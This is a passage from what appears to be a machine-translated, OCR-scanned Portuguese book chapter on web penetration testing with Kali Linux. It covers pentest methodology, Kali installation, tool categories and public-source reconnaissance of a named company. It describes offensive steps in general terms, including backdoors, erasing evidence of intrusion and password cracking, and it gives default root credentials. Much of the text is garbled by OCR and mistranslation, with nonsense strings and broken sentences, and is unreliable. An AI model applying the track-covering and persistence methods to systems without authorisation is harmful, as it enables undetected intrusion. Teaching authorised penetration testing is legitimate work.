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O sucesso de um engajamento teste de penetração para um prestador de serviços é baseado em 
rentabilidade de tempo e serviços utilizados para entregar o engajamento Teste de Invasão. 

Um processo mais eficiente e preciso significa melhores resultados para menos serviços utilizados. 
Quanto maior for a qualidade dos resultados, quanto mais próximo o serviço pode atender ao cliente 
expectativa, resultando em uma melhor reputação e mais negócios no futuro. Para estes 

razões, é importante desenvolver uma metodologia para a execução de testes de penetração 
serviços, bem como sobre como denunciar o que for encontrado. 


Conceitos Kali Testes de Penetração 


Kali Linux destina-se a seguir os fluxos de um serviço de teste de penetração 

noivado. Independentemente se o ponto de partida é branco, preto, ou teste de caixa cinza, 
há um conjunto de passos que devem ser seguidas ao Teste de Invasão um alvo 

com Kali ou outras ferramentas. 


Passo 1 - Reconhecimento 


Você deve aprender o máximo possível sobre o ambiente de um alvo eo sistema 

traços antes de lançar um ataque. Quanto mais informações você pode identificar cerca de 

um alvo, a melhor chance que você tem que identificar o caminho mais fácil e mais rápido para o 
sucesso. 

Teste de caixa preta requer mais reconhecimento do que o teste de caixa branca, pois os dados são 
não fornecidas sobre o alvo (s). Serviços de reconhecimento pode incluir pesquisa 

pegada de Internet de um alvo, os recursos de monitoramento, pessoas e processos, digitalização 
para obter informações de rede, como endereços IP e tipos de sistemas, engenharia social 

serviços públicos, como help desk e outros meios. 


Reconhecimento é o primeiro passo de um compromisso de serviço Teste de Invasão 
independentemente se você está verificando a informação conhecida ou buscando nova inteligência 
em um alvo. Reconnaissance começa por definir o ambiente de destino com base em 

o escopo do trabalho. Uma vez que o alvo é identificado, a pesquisa é realizada para reunir 
inteligência no alvo, como o que portas são usadas para a comunicação, onde 

ele está hospedado, o tipo de serviços oferecidos aos clientes, e assim por diante. Esta vontade de 
dados 

desenvolver um plano de ação em relação aos métodos mais fáceis de obter os resultados 
desejados. 

A entrega de um trabalho de reconhecimento deve incluir uma lista de todos os bens 

sendo alvo, quais aplicativos estão associados com os ativos, serviços utilizados, e 

possíveis proprietários de ativos. 


Kali Linux oferece uma categoria denominada Coleta de Informações que serve como 

um recurso de reconhecimento. As ferramentas incluem métodos para a pesquisa de rede, 
dados 

sistemas de centro, sem fio e de acolhimento. 
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O seguinte é a lista de objetivos de reconhecimento: 


e Identificar alvo (s) 

e Definir aplicativos e uso comercial 

e Identificar tipos de sistemas 

e Identificar portas disponíveis 

e Identificar serviços em execução 

e | Informações engenheiro passivamente sociais 


e Descobertas de documentos 


Etapa 2 - Avaliação Alvo 


Uma vez que um alvo é identificado e pesquisado a partir de esforços de reconhecimento, a 
próxima 

passo é avaliar o alvo para vulnerabilidades. Neste ponto, a penetração 

Tester deve saber o suficiente sobre um alvo para selecionar como analisar a possível 
vulnerabilidades ou fraqueza. Exemplos para testes para a fraqueza na forma como a web 
aplicação opera, os serviços identificados, portas de comunicação, ou outros meios. 
Avaliações de vulnerabilidade e auditorias de segurança tipicamente concluir após este 
fase do processo de avaliação alvo. 


Capturando informações detalhadas através Reconnaissance melhora a precisão 

de direcionamento de possíveis vulnerabilidades, reduz o tempo de execução para executar alvo 
serviços de avaliação, e ajuda a evitar de segurança existente. Por exemplo, executando 

um scanner de vulnerabilidade genérico contra um servidor de aplicativos web seria provavelmente 
alertar o proprietário do ativo, tome um tempo para executar e gerar apenas detalhes genéricos 
sobre o sistema e aplicações. Digitalizar um servidor para uma vulnerabilidade específica 

com base em dados obtidos a partir Reconnaissance seria mais difícil para o proprietário do ativo 
de detectar, proporcionar uma boa vulnerabilidade possível explorar e tomar segundos 

para executar. 


Avaliando metas para vulnerabilidades pode ser manual ou automático através de 

ferramentas. Há uma série de ferramentas oferecidas em Kali Linux agrupados como uma 
categoria rotulada 

Análise de Vulnerabilidade. Ferramentas variam de avaliar os dispositivos de rede de bancos de 


eAseguinte é a lista de objetivos de avaliação Alvo: 
e Alvos de avaliação para fraqueza 
e Identificar e priorizar os sistemas vulneráveis 
e Mapa sistemas vulneráveis aos proprietários de 


o Bees bertas de documentos 
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Passo 3 - Exploração 


Esta etapa explora vulnerabilidades encontradas para verificar se as vulnerabilidades são reais e que 
possível de informações ou acesso pode ser obtido. Exploração separa Penetração 

Testando serviços de serviços passivos tais como avaliações de vulnerabilidade e auditorias. 

A exploração e todas as etapas a seguir têm ramificações legais sem autorização 

dos proprietários de ativos do alvo. 


O sucesso desta etapa é fortemente dependente de esforços anteriores. A maioria dos exploits 
são desenvolvidos para vulnerabilidades específicas e pode causar consequências indesejáveis 
se executado de forma incorreta. A melhor prática é identificar um punhado de vulnerabilidades e 
desenvolvimento de uma estratégia de ataque baseado na liderança com o primeiro mais 
vulneráveis. 


Explorando alvos pode ser manual ou automatizado de acordo com o objectivo final. 

Alguns exemplos estão executando o SQL Injeções para ganhar acesso de administrador para uma 
aplicação web 

ou engenharia social uma pessoa Helpdesk em fornecer credenciais de login de administrador. 

Kali Linux oferece um catálogo dedicado de ferramentas intitulado Ferramentas de Exploração para a 
exploração de 


etas que vão desde a exploração de servicos específicos para pacotes de engenharia social. 
seguinte E a lista de ob] tivos de exploração: p p R g 


e Explorar vulnerabilidades 

e Obter apoio para o pé 

e Captura de dados não autorizada 

* Engenheiro agressivamente sociais 

e Atacar outros sistemas ou aplicações 


e Descobertas de documentos 


Passo 4 - Privilege Escalation 


Ter acesso a um alvo não garante a realização do objetivo de uma penetração 

atribuição. Em muitos casos, um sistema de exploração de vulnerável só pode dar limitado 

acesso aos dados e recursos de um alvo. O atacante deve escalar privilégios concedidos 

para obter o acesso necessário para capturar a bandeira, o que poderia ser dados sensíveis, críticos 
infra-estrutura, e assim por diante. 


Privilege Escalation pode incluir a identificação e rachaduras senhas, contas de usuário, 

e espaço de TI não autorizado. Um exemplo é alcançar o acesso de usuário limitado, identificando 
um arquivo shadow contendo as credenciais de login de administração, a obtenção de um 
administrador 

senha através de quebra de senha e acessar sistemas aplicativos internos 

com direitos de acesso de administrador. 
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Kali Linux inclui uma série de ferramentas que podem ajudar a ganhar Privilege Escalation através 
o Ataques senha e Ferramentas de Exploração catálogo. Como a maioria dessas ferramentas 
incluem métodos para obter acesso inicial e Privilege Escalation, eles estão reunidos 

e agrupados de acordo com os seus conjuntos de ferramentas. 


A seguir está uma lista de objetivos escalonamento de 
privilégios: 
e Obter acesso Escalado nível de sistema (s) e rede (s) 
e | Descubra outras informações de conta de usuário 
e | Acessar outros sistemas com privilégios escalados 


e Descobertas de documentos 


Passo 5 - a manutenção de um ponto de 


a @final é manter o acesso ao estabelecer outros pontos de entrada para o destino 
e, se possível, cobrindo evidência da penetração. E possível que a penetração 

esforços irá acionar as defesas que acabará por garantir como o verificador da penetração 
obtido o acesso à rede. A melhor prática é estabelecer outros meios de acesso 

o alvo como um seguro contra o principal caminho a ser fechado. Acesso alternativo 
métodos poderiam ser backdoors, novas contas de administração, túneis criptografados, 

e novos canais de acesso à rede. 


O outro aspecto importante da manutenção de uma posição em um alvo está removendo 
evidência da penetração. Isso fará com que seja mais difícil de detectar o ataque, assim, 
reduzindo a reacção por barreiras de segurança. Removendo evidência inclui apagamento 
usuário fizer, mascarando os canais de acesso existentes e remover os vestígios de adulteração 
como mensagens de erro causadas por esforços de penetração. 


Kali Linux inclui um catálogo intitulado Mantendo o acesso focado em manter uma 

ponto de apoio dentro de um alvo. As ferramentas são usadas para estabelecer diversas formas de 
backdoors 

em um alvo. 


A seguir está uma lista de metas para a manutenção de um ponto de 
apoio: 
* Estabelecer vários métodos de acesso à rede alvo 
e Remover prova de acesso autorizado 
* Sistemas de reparo que impactam pela exploração 
e injetar dados falsos, se necessário 
e Esconder métodos de comunicação por meio de criptografia e outros meios 


e Descobertas de documentos 
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Apresentando Kali Linux 


Os criadores do BackTrack lançaram um novo Teste de Invasão, avançado 

Distribuição Linux cnamada Kali Linux. BackTrack 5 foi a última versão principal do 

a distribuição BackTrack. Os criadores do BackTrack decidiu que para avançar 

com os desafios da segurança cibernética e testes moderno uma nova fundação foi 
necessário. Kali Linux nasceu e foi lançado em 13 de março de 2013. Kali Linux é baseado 
em Debian e um sistema de arquivos FHS-compliant. 


Kali tem muitas vantagens sobre BackTrack. Ele vem com muitas ferramentas mais atualizadas. 
As ferramentas são simplificados com os repositórios do Debian e sincronizados quatro vezes 

um dia. Isso significa que os usuários tenham as últimas atualizações de pacotes e correções de 
segurança. O novo 

sistemas de arquivos compatíveis traduzir-se em execução a maioria das ferramentas de qualquer 
lugar no sistema. 

Kali também fez personalização, instalação automática, e área de trabalho flexível 


ambientes características fortes em Kali Linux. 
Kali Linux está disponível para download em http:/Avww.kali.org/. 


Configuração do sistema 


Kiojpux pode ser baixado em algumas maneiras diferentes. Um dos mais populares 
maneiras de obter Kali Linux é baixar a imagem ISO. A imagem ISO esta disponível 
em imagens de 32 bits e de 64 bits. 


Se você planeja usar o Kali Linux em uma máquina virtual como o VMware, não 

é uma imagem pré-construídos VM. A vantagem de baixar a imagem da VM é que 

ele vem pré-carregado com ferramentas VMware. A imagem de VM é uma imagem de 32 bits com 
Physical Address Extension apoio, ou mais conhecido como PAE. Em teoria, um PAE 

do kernel permite que o sistema para acessar mais memória do que um sistema tradicional de 32 bits 
sistema operativo. Houve algumas personalidades bem conhecidas no mundo da 

sistemas operacionais que têm argumentado a favor e contra a utilidade de um kernel PAE. 

No entanto, os autores deste livro sugiro usar a imagem da VM de Kali Linux se 

planeja usá-lo em um ambiente virtual. 


Correndo Kali Linux a partir de uma mídia externa 


Kali Linux pode ser executado sem instalação de software em um disco rígido de acolhimento, 
acessando 

lo de uma fonte de mídia externa, como uma unidade de DVD ou USB. Este método é simples 

para permitir, no entanto, tem o desempenho e implementações operacionais. Kali Linux 

ter que carregar programas a partir de uma fonte remota iria afetar o desempenho e alguns 
aplicativos ou configurações de hardware podem não funcionar corretamente. Usando somente leitura 
de armazenamento 

mídia não permite salvar as configurações personalizadas que podem ser necessários para fazer Kali 
Linux . 

operar corretamente. E altamente recomendaga para instalar Kali Linux em um disco rígido host. 


Teste de Invasão e Configuração 


Instalando Kali Linux 


Instalando Kali Linux em seu computador é simples e semelhante à instalação 

outros sistemas operacionais. Em primeiro lugar, você vai precisar de hardware compatível. Barrilha 
é compatível com i386, amd64 e plataformas ARM (ambos Armel e armhf). O 

requisitos de hardware são mostrados na lista a seguir, embora sugerimos 

excedendo o valor mínimo por pelo menos três vezes. Kali Linux, em geral, 

terá um desempenho melhor se ele tem acesso a mais memória RAM e é instalado em máquinas 
mais novas. 

Baixe Kali Linux e quer queimar o ISO para DVD, ou preparar um pendrive com 

Kali Linux Viva como o meio de instalação. Se você não tiver uma unidade de DVD ou um 

Porta USB do seu computador, confira o Linux Network Kali Instalar. 


A seguir está uma lista de requisitos mínimos de instalação: 


* Um mínimo de 8 GB de espaço em disco para a instalação de Kali 
- DR quiteturas i886 e amd64, um mínimo de 512MB de RAM. 
e Suporte de inicialização de CD-DVD Drive / 


YSB. ; ; . En i 

e ocê também vai precisar de uma conexão ativa com a Internet antes da instalação. Este 
é muito importante ou você não será capaz de configurar e acessar repositórios 
durante a instalação. 


1. Quando você começar a Kali, você será presenteado com uma tela de inicialização de 
instalação. 

Você pode escolher o tipo de instalação (baseado em GUI ou baseado em texto) 

você gostaria de realizar. 


AALE ELIAS 


Boot nenu 


Live Camdb4) 
Live Canmd64 failsafe) 


Graphical install 


Text-nodo install 
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2. Selecione o idioma de preferência local, país e 
preferências do teclado. 


KALI LINUX 


Select a language 


Choose the language to be used for the installation process. The selected language wil also be the 
default language for the installed system 


Language 


Chinese (Simp ited) Sm wie) 
Chinese (Traditional ETA) 
Croatian Hrvatski 
Czech » Čeština 
Danish Dansk 
Dutch - Nederlands 


Dzongkħa - Fm 


English English 


Esperanto Esperanto 
Estonian Eesti 
Finnish Suomi 
French - Français 
Galician - Galego 
Georgian pong 
German Deutsch 


Crank ER bones 


Screenshot Continue 


3. Escolha um nome de host para o host Kali Linux. O padrao 
hostname é Kali. 


KALI LINUX 


Configure the network 


Please enter the hostname for this system, 


The hostname is a single word that identifies your system to the network. If you don't emos what your 
hostname should be, consult your network administrator If you are setting up your own home network, 
you can make something up here, 


Hostname 


Eon 
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4. Escolha uma senha. Senhas simples pode não funcionar tão 
Escolheu algo que tem um certo grau de complexidade. 


KALI LINUX 


Set up users and passwords 


You need to set a password for ‘root, the system administrative account. A maidous or unqualified user 


wh root access can have disastrous results, so you should take care to choose 3 root password that is 
not casy te guess, R should not be a word found in dictionaries, of a word that coutd be easily 
associated with you 


A good password wit cost ain o mixture of letters, numbers and punctuation and should be changed at 
regular intervals, 


The root user should mot have an empty password. E you leave this empty, the root account will be 


disabled aed the system's initial user account wil be given the power to become root using the “sudo” 
command. 


Wote that you will pot be able to see the password as you type lt, 
Root password: 
{| 


Please enter the same root password again to verily that you have typed it correctly. 
Reener password to verity 


Screenshot 


5. O próximo prompt pede para o seu fuso horário. Modificar de acordo 
e selecione Continuar. A próxima imagem mostra a seleção 
Oriental tempo padrão. 


KALI LINUX 


Configure tive clock 


If the desired time zone is nos listed, then please go back to the step “Choose anqunga. and select à 
country that uses the desired thee zope (the country where you live or are located), 


Selart your time zone 
EE Se ee a‘ 
Central 
Mountain 
P acttic 
Alaska 
Hawaii 
Arona 
East indiana 
Samoa 


_continue 
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O instalador irá pedir para configurar suas partições. Se você estiver instalando em uma Kali virtuais 
imagem, selecione Guiado Instale - disco inteiro. Isto irá destruir todos os dados do disco 

Kali e instalar Linux. Tenha em mente que em uma máquina virtual, só o disco virtual 

está sendo destruído. Os usuários avançados podem selecionar configurações manuais para 
personalizar 

partições. Kali também oferece a opção de utilizar LVM, gerente de volume lógico. LVM 

permite-lhe gerir e redimensionar partições após a instalação. Em teoria, supõe-se 

para permitir a flexibilidade, quando as necessidades de armazenamento de mudar de instalação 
inicial. No entanto, 


a menos que as suas necessidades de Kali Linux são extremamente complexas, muito provavelmente 
você não vai precisar 


KALI LINUX 


Partition disks 


The installer can guide you through partitioning a disk (using different standard schemes) or, if you 


prefer, you can do it manually. With guided partitioning you will still have a chance later to review and 
customise the results. 


if you choose quided partitioning for an entire disk, you will next be asked which disk should be used. 
Partitionung method: 
suided -use entire disk 
Guided -use entire disk and set up LVM 
Guided - use entire disk and set up encrypted LVM 
Manual 


Screenshot Go Back 


Continue 
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Teste de Invasão e Configuração 


6. A última janela apresenta uma revisão das definições de instalação. Se 


tudo parece correto, selecione Sim para continuar o processo, como mostrado 
na imagem seguinte: 


KALI LINUX 


Partition disks 


If you continue, the changes listed below will be written to the disks. Otherwise, you will be able to make 
further changes manually, 


WARNING: This will destroy all data on any partitions you have removed as well as on the partitions that 
are going to be formatted, 


The partition tables of the following devices are changed: 
SCSI3 (0,0, 0) (sda) 


The following partitions are going to be formatted: 
partition #1 of SCSI3 (0,0,0) (sda) as ext4 
partition #5 of SCSI3 (0,0,0) (sda) as swap 

write the changes to disks? 


Screenshot 


Continue 


7. Kali Linux usa repositórios centrais de distribuição de aplicativos 
pacotes. Se vocé gostaria de instalar esses pacotes, vocé precisa usar 
um espelho de rede. Os pacotes sao baixados através do protocolo HTTP. 


Se sua rede usa um servidor proxy, vocé também vai precisar configurar 
as configurações de proxy para você rede. 
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KALI LINUX 


Configure the package manager 


A network mirror can be used to supplement the software that às included on the CD-ROM. This may also 
make newer versions of software available. 


Use a network miror? 


fe 


Screenshot Go Back Continue 


8. Kali ira pedir para instalar o GRUB. GRUB é um multi-bootloader que 

dá ao usuário a capacidade de escolher e arrancar a operação múltipla 

sistemas. Em quase todos os casos, você deve selecionar para instalar o GRUB. Se 
você 

está configurando o seu sistema de dual boot, você vai querer ter 

certeza GRUB reconhece os outros sistemas operacionais a fim de que a 

dar aos usuários as opções para inicializar em um sistema operacional alternativo. 

Se ele não detectar quaisquer outros sistemas operacionais, a máquina 

iniciar automaticamente em Kali Linux. 


[27] 


Teste de Invasão e Configuração 


KALI LINUX 


install the GALA boot loader on a hard disk 


it seems that this mew installation is the only operating system on this computer If so, it should be safe 
to install the GRUB boot loader to the master boot record of your first hard drive. 


Warning: If the installer failed to detect another operating system that is present on your computer 
modifying the master boot record will make that operating system temporarily unboot able, though GRUB 
can be Manually configured later to boot it. 

Wetan the GAVO boot asdar to the master boot record? 


No 


+ 


Go Back continue 


9. Parabéns! Você terminou de instalar Kali Linux. Você irá 


deseja remover todos os meios (físicos ou virtuais) e selecione Continuar 
para reiniciar o sistema. 


KALI LINUX 


Finish the installation 


instaladon comple te 
installation is complete, so @ is time to boot into your now — Make sure to ramove the 
installation media (CO-ROM, Noppies), so that you boot into the new system rather than 
restarting the installation 


Screenshot 


Go Back 
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Kali Linux e VM imagem primeira corrida 


Em alguns métodos de instalação Kali, você será solicitado a definir a senha do root. 
Quando Kali Linux inicializa, digite o nome de usuário do root ea senha que você selecionou. 
Se você baixou uma imagem de VM de Kali, você vai precisar da senha de root. O padrão 
nome de usuário é raiz e senha é toor. 


Visão geral ferramentas Kali 


Kali Linux oferece uma série de ferramentas personalizadas concebidas para testes de 
penetração. 

Ferramentas são classificadas nos seguintes grupos como visto no menu drop-down 
mostrado na tela a seguir: 


Applications Plecs g b 
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Teste de Invasão e Configuração 


e Coleta de Informações: Estas são ferramentas de reconhecimento utilizados para coletar 
dados 
em sua rede alvo e dispositivos. Ferramentas variam de identificar os dispositivos a 


protocolos utilizados. 
e Análise de Vulnerabilidade: Ferramentas deste secção concentrar em sistemas de avaliação 


de vulnerabilidades. Normalmente, estes são executados em sistemas encontrados usando 
0) 


Coleta de informações ferramentas de reconhecimento. 
* Aplicações Web: Estas são ferramentas utilizadas para auditar e explorar vulnerabilidades 


em servidores web. Muitas das ferramentas de auditoria, vamos referimos neste livro vêm 
directamente a partir desta categoria. No entanto aplicações web nem sempre se referem 
de ataques contra servidores web, eles podem simplesmente ser ferramentas baseadas na 
Web para 

serviços de rede. Por exemplo, a web proxies será encontrado em 

nesta seção. 


e Senha Ataques: Esta seção de ferramentas lida principalmente com a força bruta ou 
a computação desligada de senhas ou códigos compartilhados usados para autenticação. 


e Ataques sem fio: Estas são ferramentas utilizadas para explorar as vulnerabilidades 
encontradas em 
protocolos sem fio. 802.11 ferramentas serão encontrados aqui, incluindo ferramentas 
como 
aircrack, airmon e ferramentas de quebra de senhas wireless. Além disso, esta 
seção tem ferramentas relacionadas a vulnerabilidades de RFID e Bluetooth também. Em 
muitos casos, as ferramentas desta seção terá de ser usado com uma rede sem fio 


- — PRADEEP EIB ISA CASENIADCAS O KA BALE SSEtil LASS ME MABPAPrOmísCUO. 


vulnerabilidades encontradas 
em sistemas. Normalmente, a vulnerabilidade é identificada durante uma 
vulnerabilidade 
- Ansira acfalaifigação: Estas são as ferramentas utilizadas para a captura de pacotes 
de rede, 
manipuladores de pacotes de rede, aplicações de artesanato pacotes e web 
spoofing. Há também algumas aplicações de reconstrução VolP. 
e | Mantendo o acesso: Manter ferramentas de acesso são usados uma vez um ponto de 
apoio i 
é estabelecida em uma rede ou sistema alvo. E comum encontrar 
sistemas comprometidos com vários ganchos de volta para o atacante 
fornecer rotas alternativas em caso de uma vulnerabilidade que é usado por 
o atacante é encontrado e corrigido. 


* Engenharia reversa: Estas ferramentas são usadas para desativar um executável 
e programas de depuração. O objetivo da engenharia reversa está analisando 
como foi desenvolvido um programa para que possa ser copiado, modificado, ou levar a 
desenvolvimento de outros programas. Engenharia reversa também é usado para 
análise de malware para determinar o que faz um executável ou por pesquisadores 
para tentar encontrar vulnerabilidades em aplicações de software. 
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e Teste de Stress: Ferramentas de testes de estresse são utilizados para avaliar a quantidade 
de dados a 
sistema pode manipular. Resultados indesejados podem ser obtidos a partir de sobrecarga 
sistemas como causando um dispositivo de controle de comunicação de rede para 
abrir todos os canais de comunicação ou de um sistema de desligar (também conhecido 
como 


- Haralareeterpgacaadieaayieshtém ferramentas de Android, que poderiam ser 
classificada como ferramentas móveis, e Ardunio que são utilizados para a programação e 
controlar outros pequenos dispositivos eletrônicos. 


* Forense: Ferramentas forenses são usados para monitorar e analisar o computador 
tráfego de rede e aplicações. 


* Ferramentas de Relatórios: As ferramentas de relatórios são métodos para entregar 
informações encontradas 


durante um exercício de penetração. | 
e | Serviços do Sistema: Isto é onde você pode ativar e desativar serviços de Kali. 


Os serviços são agrupados em carne bovina, Dradis, HTTP, Metasploit, MySQL, e SSH. 


navegadores, links rápidos para ajustar a forma como a construção Kali Linux é pisto 
em 


<  Existem outras ferramentas incluídas no Kali Linux construir tais como web 
da rede, ferramentas de busca e outras aplicações úteis. 


Resumo 


Este capítulo serve como uma introdução para Aplicações Web Teste de Invasão 

e uma visão geral sobre a criação de Kali Linux. Nós começamos definindo as melhores práticas 
para a realização de serviços de Teste de Penetração incluindo risco de definição e diferenças 
entre vários serviços. O principal argumento é o de entender o que faz um 

Penetração teste diferente de outros serviços de segurança, como fazer corretamente escopo 
um nível de serviço e melhor método para executar serviços. Posicionando-se o direito 
expectativas iniciais com um cliente potencial vai melhor qualificar a oportunidade 

e simplificar o desenvolvimento de um âmbito aceitável de trabalho. 


Este capítulo continuou com o fornecimento de uma visão geral de Kali Linux. Os tópicos incluídos 
como baixar a versão desejada de Kali Linux, maneiras de executar a instalação, 

e uma breve visão geral de conjuntos de ferramentas disponíveis. O próximo capítulo irá cobrir como 
executar 

Reconhecimento em um alvo. Este é o primeiro e mais importante passo na concretização 

Serviços de testes de penetração. 
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Reconhecimento 


O termo Reconhecimento por definição vem da estratégia de guerra militar de 

explorar além da área ocupada por forças amigas para obter informações sobre o 

inimigo para análise ou ataque futuro. Reconhecimento de sistemas de computador é semelhante 
na natureza, ou seja, normalmente um verificador da penetração ou hacker vai tentar aprender como 
tanto quanto possível sobre o ambiente de um alvo e características do sistema antes do lançamento 
um ataque. Isto também é conhecido como o estabelecimento de uma Pegada de um alvo. 
Reconhecimento 

normalmente é passiva na natureza e em muitos casos não é ilegal (no entanto, não somos 
advogados e não podem oferecer aconselhamento legal) para executar, desde que você não 
completar um 

handshake de três vias com um sistema não-autorizado. 


Exemplos de Reconnaissance incluir qualquer coisa de pesquisar um alvo no público 

fontes, como o Google, a atividade de monitoramento empregado para aprender os padrões de 
operação, 

e redes ou sistemas de varredura para coletar informações, tais como fabricação 

tipo, sistema operacional, e portas de comunicação abertas. Quanto mais informações 

pode ser recolhida sobre um alvo traz uma melhor chance de identificar o mais fácil e 

método mais rápido para alcançar uma meta de penetração, bem como melhor método para evitar 
existente 

segurança. Além disso, alertando um alvo provavelmente irá causar algumas avenidas de ataque para 
fechar 


como'OmaaisagÃeta pocpasegômaaraals valesléecspagare Visa! da Kali diz isso melhor: 


Serviços de reconhecimento deve incluir documentação pesado, porque foram encontrados dados 
pode ser relevante em um momento posterior, no exercício de penetração. Os clientes também vão 
querer 

saber como os dados específicos foi obtida, e pedir referências a recursos. 

Exemplos são o que as ferramentas foram utilizadas para a obtenção dos dados ou o que publicfacing 
recursos, por exemplo, a consulta de pesquisa específica no Google que foi submetido a 

obter os dados. Informar um cliente "você obteve o objetivo" não é bom o suficiente, 

porque a finalidade de um teste de penetração é identificar fraqueza para reparos futuros. 


Reconhecimento 


Objetivos de reconhecimento 


e  Alvo de fundo: Qual é o foco dos negócios do alvo? 
e | Associados de alvo: Quem são os parceiros de negócios, fornecedores e clientes? 


e O investimento da Target em segurança: As políticas de segurança anunciado? O que é 
conscientização de segurança da segurança de investimento em potencial, e do usuário? 


e Políticas comerciais e de segurança do alvo: Como é que o negócio funcionar? 
Onde estão os potenciais pontos fracos na operação? 


e Opovo de alvo: Que tipo de pessoas trabalham lá? Como é que eles podem tornar-se 
o seu trunfo para o ataque? 


e | Definir metas: Quais são as menores metas de frutas penduradas? O que deve 
ser evitado? 


e Rede da Target: Como as pessoas e os dispositivos se comunicam em 
a rede? 


e Defesas do alvo: Que tipo de segurança está em vigor? Onde ela está localizada”? 


e | Tecnologias de alvo: Que tecnologias são usadas para e-mail, rede 
tráfego, armazenar informação, de autenticação, e assim por diante? Eles são vulneráveis? 


Kali Linux contém um extenso catálogo de ferramentas intitulado Coleta de Informações 
especificados para os esforços de reconhecimento. Poderia encher um livro separado para cobrir 
todas as ferramentas 

e métodos oferecidos para coleta de informações. Este capítulo se concentrará em vários 

tópicos de reconhecimento de aplicações web e relacionar as melhores ferramentas encontradas no 
Internet, bem como o oferecido pela Kali Linux. 


A pesquisa inicial 


Reconnaissance deve começar com a aprendizagem, tanto quanto possível sobre as pessoas e 
negócio associado ao alvo. Sun Tzu é creditado com a frase ", conhecer o seu 

inimigo "no livro, A Arte da Guerra. Como um verificador da penetração, você precisa conhecer o seu 
alvo. Se o seu alvo passa a ser um site, você deve olhar para todos os aspectos do que 

site. Ele vai lhe dar uma melhor compreensão de como o site é mantido e 

executar. Grande Reconnaissance retorna mais vulnerabilidades possíveis. 


É assustador a quantidade de informação está disponível em fontes públicas. Temos encontrado 

O inimaginável, como documentos classificados, senhas, relatórios de vulnerabilidade, 

fotografia indesejável e acesso a câmeras de segurança. Muitos testes de penetração 

objetivos do projeto começar com aproveitamento de informações fora de fontes públicas. Aqui estão 
alguns 

pontos de partida para a coleta de informações a partir de fontes públicas. 
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Site da empresa 


Existe uma grande quantidade de informações valiosas que podem ser obtidas no site do alvo. 
Listar a maioria dos sites corporativos sua equipe executiva, figuras públicas e membros de 
recrutamento e recursos humanos contatos. Estes podem tornar-se alvos para outra pesquisa 
esforços e ataques de engenharia social. 


Mais informações valiosas podem ser obtidas por olhar para o que as outras empresas 

são listados como parceiros, anúncios de emprego atuais, informações comerciais e de segurança 
políticas. Reconhecimento de um parceiro de alto valor pode ser tão importante quanto a 

alvo principal, porque os parceiros podem fornecer uma nova fonte para a obtenção de 
inteligência. Um exemplo é comprometer um recurso contratado que gerencia 

o helpdesk na sede do alvo. 


O Robots.txt arquivo está disponível e encontrado em sites publicamente que dá 

instruções para os robôs web (também conhecido como o mecanismo de busca), sobre o que 
é e não é visível usando o Robots Exclusion Protocol. O Disallow: / afirmação 

diz um navegador não visitar uma fonte, no entanto, uma Disallow pode ser ignorado, dando 
uma inteligência pesquisador sobre o que é um alvo espera não divulgar ao público. 


Para ver o Robots.txt arquivo, encontrar o Robots.txt arquivo no diretório raiz de um alvo 
site. Por exemplo, adicionando o Robots.txt arquivo para Facebook ficaria como mostrado 
na imagem seguinte: 


- CG E httos://www.facebook.com/ robots.txt 


Notice: if you would like to crawl Facebook you can 

contact us here: http://www. facebook. com/appsísite scraping tos. php 
to apply for white listing. Our general terms are available 

at http://www. facebook. com/apps/site scraping tos terms.php 


User-agent: bDaiduspider 
Disallow: /ac.php 

Disallow: /ac.php 

Disallow: /ajax/ 

Disaliow: /album.php 
Disallow: /ap.php 

Disallow: /autologin. php 
Disallow: /checkpoint/ 
Disallow: /feeds/ 

Disallow: /l.php 

Disallow: /o.php 

Disallow: /p.php 

Disallow: /photo.php 
Disallow: /photo comments .php 
Disallow: /photo scarch.pho 
Disallow: /photos.php 
Disallow: /share.php 
Disallow: /aharer/ 
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Fontes de história Web 


Existem versões arquivadas da maioria dos sites públicos disponíveis no fontes, como o 

Wayback Machine em archive.org. Informação de interesse podem ser encontrados em mais velhos 
versão do site de um alvo, como organogramas desatualizados, números de telefone, 

inteligência do cliente, sistemas de informação listada nos campos, tais como ver fonte ou 

/ Robots.txt, Parcerias de negócios mais velhos, vulnerabilidades corrigidas em versões posteriores, 
e outros dados úteis, o alvo não quer na versão de site atual. E 

importante entender que a informação publicamente disponível é difícil de remover 
completamente, fazendo com que as fontes históricas de um lugar valioso para a pesquisa de 
reconhecimento. 


Para acessar o Wayback Machine, abrir o navegador web e navegue até 
http://archive.org, Você verá o Internet Archive Wayback Machine 
no meio da página, como mostra a imagem a seguir: 
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Digite a URL que você gostaria de navegar e ver se todos os arquivos foram capturados. 
A história do arquivo pode ser visto aqui, como mostrado na imagem seguinte: 


INTERNET ARCHIVE http:/iwww.lancope.com Co Wayback! 


waueseumeehine Nin Www lencooe com has been crawled 100 mes gore all the way back 19 Cobrar 20 2001 


A craw! te" De a dica of su E rmppaes mica! 25%, cf tha ima portas 420 000, wetted FAQ 


Is os alld, bd T it aly 
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Como um verificador da penetração, esta é uma ferramenta valiosa, pois não deixar provas de 
Reconhecimento em seu alvo. Na verdade, o seu alvo é nunca sequer tocou usando este 
ferramenta. Toda a informação foi arquivada em linha no Wayback Machine. O 

duas próximas imagens mostram www.lancope.com em 2002 em comparação a 2013: 


Lancope 


Keyword Search 


an 
STEALTH 
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Network Security 
to Combat Today's 
Advanced Hacker 


Lancope develops next-generation intrusion n 
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Cisco” Cyber Threat Defense Solution 
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Registros Regionais da Internet (RIRs) 


RIR é uma organização que gerencia a alocação de recursos e registro de IP 

dentro de uma região específica do mundo. Há cinco principais RIRs: a EUA, Canada, 
e em partes da região do Caribe pode ser encontrada em www.arin.net. Você pode reunir 
informações sobre um alvo, como Lancope, como visto na imagem seguinte: 


Name Lancope 
Handle LANCOP 


Street 3155 Royal Drive 
Building 100 


City Alpharetta 
State/Province 
Postal Code 


Country 


Registration Date 2002-06-21 


Last Updated 2011-09-24 
Comments 

RESTful Link 

See Also 

See Also 

See Also 
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Eletrônico coleta de dados, análise e 
Retrieval (EDGAR) 


O banco de dados EDGAR contém declarações de registro, relatórios periódicos, e outros 

formas de informação sobre as empresas desde 1994. As empresas nos Estados Unidos da 
América são obrigados por lei a apresentar, e todas as informações estão disponíveis ao público. O 
duas seguintes imagens mostram documentos públicos encontrados durante a pesquisa Lancope: 


Filing Detail 


SEC Home » Search me Next-Generation EDGAR System » Company Search n Current Page 


Document Format Files 


Description 

AUTO-GENERATED PAPER DOCUMENT 
Scanned paper document 

Complete submission text fila 


LANCOPE INC (Filer) CIK: 0001178004 (see all company filings) 


IRS No.: 000000000 
Type: REGDEX | Act 34 | File No.: 021-45780 | Film No- 08045849 


